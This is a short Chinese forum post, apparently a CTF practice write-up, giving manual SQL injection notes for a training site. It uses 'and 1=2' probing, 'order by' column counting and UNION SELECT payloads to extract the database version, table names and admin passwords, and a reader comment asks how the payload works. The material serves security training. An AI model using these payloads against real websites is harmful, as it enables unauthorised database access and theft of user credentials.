猫舍第一题sql手注笔记
1、首先进到猫舍介绍链接
2、在id=1后面加参数“and 1=1”回车观察返回信息,页面正常。然后改参数为“and 1=2”再回车,页面报错,表明存在注入点
3、使用order by来猜测数据库有多少个字段,首先是在id=1后面加参数“order by 1”,页面正常,后面继续试“order by 2”也正常,再试“order by 3”时,页面报错,由此可以猜测数据库含有2个字段,由于该题是用于练习,所以字段较少,实际猜测可以使用二分之一法则
4、使用联合查询来暴露出页面信息,在id=1后面加 and 1=2 union select 1,2
利用该方法查询数据库版本信息,在id=1后面加 and 1=2 union select 1,version()
数据库名也可以查出
5、知道数据库为MySQL数据库版本,可以百度mysql数据库获取表名的语句
查找所有表的语句select table_name from information_schema.tables where table_schema='当前数据库'
6、查询密码 and 1=2 UNION SELECT 1,password from admin
用户名也可以查到
打赏我,让我更有动力~
登录后才可发表内容
返回首页
CTF&WP专版
天空龙
发表于 2018-7-17
楼主,请教一下,那个 and 1=2 在 and 1=2 union select 1,2这句中的作用是什么呢?为什么去掉后就显示不出2来了呢?
评论列表
加载数据中...